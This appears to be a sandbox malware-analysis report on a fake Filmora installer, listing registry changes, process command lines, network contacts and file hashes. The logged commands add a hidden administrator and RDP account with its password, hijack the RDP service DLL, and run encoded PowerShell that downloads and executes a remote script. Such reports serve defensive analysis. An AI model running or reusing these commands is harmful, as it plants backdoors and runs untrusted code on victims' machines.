| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES385B.tmp" "c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 9aDQknBl /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 9aDQknBl /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 9aDQknBl /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 9aDQknBl
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 9aDQknBl
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 9aDQknBl
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | platform.wondershare.com | udp |
| N/A | 47.91.67.36:80 | platform.wondershare.com | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | www.speedtest.net | udp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:443 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | c.speedtest.net | udp |
| N/A | 151.101.2.219:443 | c.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.kabeltex.nl | udp |
| N/A | 82.151.33.2:8080 | speedtest.kabeltex.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.zeelandnet.nl | udp |
| N/A | 212.115.192.180:8080 | speedtest.zeelandnet.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.worldstream.nl | udp |
| N/A | 185.182.195.78:8080 | speedtest.worldstream.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.caiw.net | udp |
| N/A | 62.45.44.26:8080 | speedtest.caiw.net | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/680-114-0x0000000000490000-0x0000000000491000-memory.dmp
memory/680-116-0x0000000002A10000-0x0000000002A12000-memory.dmp
memory/2488-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/2488-120-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/2488-122-0x0000000003010000-0x0000000003011000-memory.dmp
memory/2488-123-0x0000000005800000-0x0000000005831000-memory.dmp
memory/3268-125-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/3304-124-0x0000000000000000-mapping.dmp
memory/3304-129-0x0000017AF7BF0000-0x0000017AF7E9A000-memory.dmp
memory/3304-131-0x0000017AF5910000-0x0000017AF5912000-memory.dmp
memory/3304-132-0x0000017AF5913000-0x0000017AF5915000-memory.dmp
memory/3304-133-0x0000017AF5915000-0x0000017AF5916000-memory.dmp
memory/3304-134-0x0000017AF5916000-0x0000017AF5917000-memory.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/1684-136-0x0000000000000000-mapping.dmp
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
| MD5 | ad0967a0ab95aa7d71b3dc92b71b8f7a |
| SHA1 | ed63f517e32094c07a2c5b664ed1cab412233ab5 |
| SHA256 | 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc |
| SHA512 | 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b |
memory/1684-140-0x0000000003030000-0x0000000003032000-memory.dmp
memory/1816-141-0x0000000000000000-mapping.dmp
memory/1816-147-0x000002A92E0E0000-0x000002A92E0E1000-memory.dmp
memory/1816-152-0x000002A92E290000-0x000002A92E291000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/3860-160-0x0000000000000000-mapping.dmp
memory/1816-161-0x000002A915323000-0x000002A915325000-memory.dmp
memory/1816-159-0x000002A915320000-0x000002A915322000-memory.dmp
memory/1816-162-0x000002A915326000-0x000002A915328000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdline
| MD5 | 4e052ea9ba7a45545631bdb647d0cece |
| SHA1 | 18737bc8a2515039b73a4b2f11ad1b724c889fac |
| SHA256 | 7670437a5030cf05789e447da5c1bac276c7b1c108f8d35170a5f6239a79fbad |
| SHA512 | e35545b7c5364f04f823a24acde8a2a6dbbbbc30b421a28ea839ab09ad2d26477814b5f50971d1426e31024af24b9da9ea80cdcb5ab627630ba910e7de66d19b |
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1776-165-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMP
| MD5 | a51da7f1861b4b8bd423bd545f0c0265 |
| SHA1 | 0a864e1720dfc97f0e4bb53e661ba10c6ff15242 |
| SHA256 | a36fcfe211505cc87c0a322d0abfee0dd75a9ffb1de6fbbec107c8b7514694ec |
| SHA512 | 4621e7d87671d7d731672c775473c06d77fb14df08b1999423f0e7aa7ae38d8c17cbe8c97b30fa668fc999c202d89e67aca5726bab7d000dc44c8276c20f5298 |
C:\Users\Admin\AppData\Local\Temp\RES385B.tmp
| MD5 | ac3224d41bce4537262e7f8ba8d78f58 |
| SHA1 | e5113a1986082373e7ed1f456bc7b16165f5e5f2 |
| SHA256 | 0381df5785f837ae79f0d6ef628ff48d2dbd4df2773656c4cd612dca8dfdffbb |
| SHA512 | 1922af989c089fbc3c68f49ba7b02a36457ee792d3a44a44dbf4235895ddbbba10c0d7eeb5b3ae8ec556e63e88edbac8228eaa6dedb4c3d66c9b440faa640120 |
C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.dll
| MD5 | 726e1b64e82e6db7580e571d65e9ca11 |
| SHA1 | 0da75ac717cf19f56fefd0c652476733eb029ea5 |
| SHA256 | 7dc1a57e90035e81a464fd2dccb80690706d2dcc34d6b9e90df3492ca84f733e |
| SHA512 | fa5cdc52873fd5185f6e0fb33d74abc947ac8bede7fdc20e7a157ea1e5209ef902e5c346109ef228112fc7a891f143004ad7cc280c2eb6bd0149accd1d4e3a56 |
memory/1816-169-0x000002A92E240000-0x000002A92E241000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1816-176-0x000002A92E7F0000-0x000002A92E7F1000-memory.dmp
memory/1816-177-0x000002A92EB80000-0x000002A92EB81000-memory.dmp
memory/3844-184-0x0000000000000000-mapping.dmp
memory/3844-192-0x0000024A39F70000-0x0000024A39F72000-memory.dmp
memory/1816-191-0x000002A915328000-0x000002A915329000-memory.dmp
memory/3844-193-0x0000024A39F73000-0x0000024A39F75000-memory.dmp
memory/3844-227-0x0000024A39F76000-0x0000024A39F78000-memory.dmp
memory/3844-228-0x0000024A39F78000-0x0000024A39F7A000-memory.dmp
memory/1988-233-0x0000000000000000-mapping.dmp
memory/1988-274-0x0000018CF2580000-0x0000018CF2582000-memory.dmp
memory/1988-275-0x0000018CF2583000-0x0000018CF2585000-memory.dmp
memory/1988-279-0x0000018CF2588000-0x0000018CF258A000-memory.dmp
memory/1988-277-0x0000018CF2586000-0x0000018CF2588000-memory.dmp
memory/1784-281-0x0000000000000000-mapping.dmp
memory/1784-317-0x0000015FFD9D0000-0x0000015FFD9D2000-memory.dmp
